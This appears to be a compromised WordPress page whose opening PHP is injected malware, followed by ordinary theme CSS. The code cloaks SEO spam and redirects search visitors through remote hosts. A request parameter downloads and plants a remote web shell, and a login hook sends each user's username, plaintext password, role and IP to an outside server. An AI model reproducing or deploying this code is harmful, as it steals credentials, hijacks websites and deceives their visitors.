if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE HTML><html lang="en-CA"><head><script data-no-optimize="1">var litespeed_docref=sessionStorage.getItem("litespeed_docref");litespeed_docref&&(Object.defineProperty(document,"referrer",{get:function(){return litespeed_docref}}),sessionStorage.removeItem("litespeed_docref"));</script> <meta charset="UTF-8"><style id="litespeed-ccss">ul{box-sizing:border-box}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}body{--wp--preset--color--black:#000;--wp--preset--color--cyan-bluish-gray:#abb8c3;--wp--preset--color--white:#fff;--wp--preset--color--pale-pink:#f78da7;--wp--preset--color--vivid-red:#cf2e2e;--wp--preset--color--luminous-vivid-orange:#ff6900;--wp--preset--color--luminous-vivid-amber:#fcb900;--wp--preset--color--light-green-cyan:#7bdcb5;--wp--preset--color--vivid-green-cyan:#00d084;--wp--preset--color--pale-cyan-blue:#8ed1fc;--wp--preset--color--vivid-cyan-blue:#0693e3;--wp--preset--color--vivid-purple:#9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple:linear-gradient(135deg,rgba(6,147,227,1) 0%,#9b51e0 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan:linear-gradient(135deg,#7adcb4 0%,#00d082 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange:linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:linear-gradient(135deg,rgba(255,105,0,1) 0%,#cf2e2e 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray:linear-gradient(135deg,#eee 0%,#a9b8c3 100%);--wp--preset--gradient--cool-to-warm-spectrum:linear-gradient(135deg,#4aeadc 0%,#9778d1 20%,#cf2aba 40%,#ee2c82 60%,#fb6962 80%,#fef84c 100%);--wp--preset--gradient--blush-light-purple:linear-gradient(135deg,#ffceec 0%,#9896f0 100%);--wp--preset--gradient--blush-bordeaux:linear-gradient(135deg,#fecda5 0%,#fe2d2d 50%,#6b003e 100%);--wp--preset--gradient--luminous-dusk:linear-gradient(135deg,#ffcb70 0%,#c751c0 50%,#4158d0 100%);--wp--preset--gradient--pale-ocean:linear-gradient(135deg,#fff5cb 0%,#b6e3d4 50%,#33a7b5 100%);--wp--preset--gradient--electric-grass:linear-gradient(135deg,#caf880 0%,#71ce7e 100%);--wp--preset--gradient--midnight:linear-gradient(135deg,#020381 0%,#2874fc 100%);--wp--preset--duotone--dark-grayscale:url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale:url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow:url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red:url('#wp-duotone-blue-red');--wp--preset--duotone--midnight:url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow:url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green:url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange:url('#wp-duotone-blue-orange');--wp--preset--font-size--small:13px;--wp--preset--font-size--medium:20px;--wp--preset--font-size--large:36px;--wp--preset--font-size--x-large:42px;--wp--preset--spacing--20:.44rem;--wp--preset--spacing--30:.67rem;--wp--preset--spacing--40:1rem;--wp--preset--spacing--50:1.5rem;--wp--preset--spacing--60:2.25rem;--wp--preset--spacing--70:3.38rem;--wp--preset--spacing--80:5.06rem}*,body,div,form,h2,h4,html,input,li,p,ul{outline:0;vertical-align:baseline;background:0 0;margin:0;padding:0}li,ul{list-style:none;list-style-position:outside!important}*{outline:0}a img{border:none}img{vertical-align:top;max-width:100%;height:auto;border:0}article,aside,header,nav{display:block}script{display:none!important}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased}a{background:0 0;text-decoration:none;color:#111}input,textarea{font-family:inherit;font-size:100%;margin:0}input{line-height:normal}textarea{overflow:auto;vertical-align:top;max-width:100%;min-height:100px}body{margin:0}input:-webkit-autofill{-webkit-box-shadow:0 0 0 1000px #fff inset}input::-moz-focus-inner{border:0;padding:0}body{position:relative;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;word-wrap:break-word;font-family:source_sans_proregular,'Helvetica Neue',Arial,Helvetica,Geneva,sans-serif;font-size:14px;color:#222;font-weight:400;line-height:22px;letter-spacing:normal;background:#292929}ul{list-style-position:inside!important}ul{list-style:circle}p{margin:0 0 20px}a,input{-ms-touch-action:none!important}body,html{min-height:100%;min-width:100%}#main-content img{max-width:100%;border:0;vertical-align:middle;-ms-interpolation-mode:bicubic}#main-content img{max-width:100%;height:auto}#main-wrapper.hb-stretched-layout{width:100%;margin-bottom:0;margin-top:0;background:#f9f9f9}#hb-wrap{position:relative;-webkit-backface-visibility:hidden}h2,h4{color:#323436;line-height:1.5;font-family:Museo500Regular;font-weight:400;margin:0 0 15px}h2 a{font-weight:inherit;color:#000}h2{font-size:24px}h4{font-size:18px}ul,ul li{padding:0;margin:0}#main-content ul ul{margin-left:18px}#main-content ul li{list-style-type:square}#main-content ul ul li{list-style-type:circle}#hb-blog-posts,#main-nav li a,#main-nav ul.sub-menu,#main-nav ul.sub-menu li,.container,.container-wide,.hb-button,.row,input,textarea{-webkit-box-sizing:border-box;box-sizing:border-box}#main-nav>li,#main-nav>li>a,.item-overlay-text,.row,.sub-menu{-webkit-backface-visibility:hidden}.row.main-row{-webkit-backface-visibility:hidden;backface-visibility:hidden}.row{width:auto;max-width:none;min-width:0;margin:0 -15px}.row.right-sidebar{margin-left:0;margin-right:0}.row .col-3,.row .col-9{float:left;min-height:1px;padding:0 15px;position:relative;margin-bottom:20px;-webkit-box-sizing:border-box;box-sizing:border-box;margin-left:0;-webkit-backface-visibility:hidden;backface-visibility:hidden}.row .col-3{width:25%}.row .col-9{width:75%}input[type=email],input[type=text],textarea{border-radius:0;padding:12px 12px 10px!important;width:100%;border:1px solid #e3e3e3;color:#777;background-color:rgba(0,0,0,.05);outline:0;position:relative;z-index:9}#hb_contact_subject_id{display:none;visibility:hidden}#hb-header{position:relative;display:block;z-index:998}#header-inner{position:relative;width:100%}#slider-section{display:block;width:100%;height:auto;position:relative;margin-top:-1px;background:0 0/cover no-repeat #323436;z-index:99;overflow:hidden}#header-inner-bg{background:#fff;border-bottom:1px solid #ebebeb;left:0;top:0;width:100%;height:100%;z-index:1}.sf-menu ul li{width:100%}.sf-menu li{float:left;position:relative}.sub-menu{z-index:3;margin-left:1px}.sf-menu li li a,.sf-menu li li a:visited{padding-left:1.25em}.sf-menu ul{position:absolute;top:-999em;width:15em}.sf-menu a{display:block;position:relative}.hb-alt-sidebar #main-content .hb-sidebar:after{content:' ';position:absolute;top:0;left:2px;width:500%;z-index:-1;height:100%}.hb-alt-sidebar .hb-main-content,.hb-alt-sidebar .hb-sidebar{border:none!important}#show-nav-menu{margin-right:30px;font-size:28px;float:right;display:none}#show-nav-menu i,.nav-type-1 #show-nav-menu{margin-right:0}.main-navigation{z-index:9999;-webkit-backface-visibility:hidden}#main-nav{float:right;z-index:999;margin:0;list-style:none;line-height:inherit}#main-nav li{position:relative;line-height:inherit;z-index:99999;float:left;display:inline-block}#main-nav>li{margin-left:1px!important}#main-nav li a{display:block;position:relative;margin:0;padding:0 11px;text-decoration:none;text-transform:none;font-family:source_sans_proregular;line-height:inherit!important;color:#454545;background-color:transparent}#mobile-menu>div>.menu-main-menu-container{margin-bottom:100px!important}#mobile-menu-wrap{position:fixed;top:0;right:-320px;z-index:999992;visibility:hidden;width:320px;height:100%;background:#252525;border-left:1px solid #333}#mobile-menu-wrap .sub-menu{margin-left:0!important;-webkit-box-shadow:none;box-shadow:none}.mobile-menu-close{position:fixed;top:0;right:-100px;font-size:20px;display:block;color:#fff;z-index:9999;padding:0 13px;line-height:49px;width:24px;text-align:center;border-left:1px solid #444}.mobile-menu-close i{z-index:9999;color:#fff;font-size:16px}.hb-top-holder{border:none!important;background:#131313!important;color:#fff!important;font-size:14px;border-bottom:1px solid #444!important;padding:15px 150px 15px 20px!important}#mobile-menu-wrap .hb-top-holder{padding:0!important;height:49px}#mobile-menu{max-height:100%;position:relative;overflow-y:scroll;-webkit-overflow-scrolling:touch;padding-bottom:60px}#mobile-menu::-webkit-scrollbar{display:none}#mobile-menu ul{margin-bottom:0}#mobile-menu ul li a{display:block;padding:10px 20px;color:#fff}#mobile-menu ul li a{background:0 0!important}#mobile-menu ul li{border-top:1px solid #333;border-bottom:0}#mobile-menu ul.sub-menu{background:0 0;margin-left:0}#mobile-menu ul.sub-menu li a{padding-left:30px}#mobile-menu.interactive>div>.menu-main-menu-container>li ul{display:none;background-color:rgba(0,0,0,.2)}#mobile-menu.interactive li.menu-item{height:auto!important}#mobile-menu.interactive>div>.menu-main-menu-container>li,#mobile-menu>div>.menu-main-menu-container>li a{position:relative}#mobile-menu.interactive ul.sub-menu li a{padding-left:40px}#mobile-menu.interactive ul.sub-menu li a:before{content:'14 ';padding-right:7px}#main-nav ul.sub-menu{height:auto!important;line-height:22px!important;position:absolute;top:100%;left:-1px;margin-top:-1px;display:none;z-index:99998;background:#333;padding:0!important}#main-nav>li>ul.sub-menu{border-top-left-radius:0;border-top-right-radius:0}#main-nav ul.sub-menu 